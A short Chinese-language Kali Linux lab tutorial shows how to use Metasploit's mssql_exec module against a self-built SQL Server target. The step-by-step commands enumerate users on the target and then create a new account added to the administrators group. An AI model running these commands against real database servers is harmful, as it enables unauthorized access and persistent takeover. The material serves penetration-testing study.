一、課前宣告
1、本分享僅做學習交流，請自覺遵守法律法規！
2、搜尋：Kali 與程式設計，學習更多網路攻防乾貨！
3、Kali 與程式設計每天準時更新，敬請學習和關注！
二、資源裝備
1.安裝好 Kali Linux 的虛擬機器一臺
2.搭建好Sql server的靶機一個；
3.整裝待發的小白一個。
三、戰略安排
3.1 進入Metasploit（msf）滲透測試框架，如下圖所示。
命令：msfconsole

3.2 利用Metasploit（msf）滲透框架對目標主機漏洞利用模組進行檢索，如下圖所示。
命令：search mssql_exec

3.3 如下圖所示，利用檢索到的漏洞利用模組。

3.4 檢視需要設定的攻擊引數，如下圖所示。
命令：show options

3.5 設定cmd命令對目標主機進行控制，如下圖所示。
3.5.1 利用cmd命令檢視目標主機的使用者組
命令：set CMD cmd.exe /c net user
命令：run

3.5.2 利用cmd命令在目標主機上建立新的使用者，並且把賬戶新增到管理員組中，如下圖所示。
命令：set CMD cmd.exe /c net user 使用者名稱 密碼 /add&net localgroup administrator 使用者名稱 /add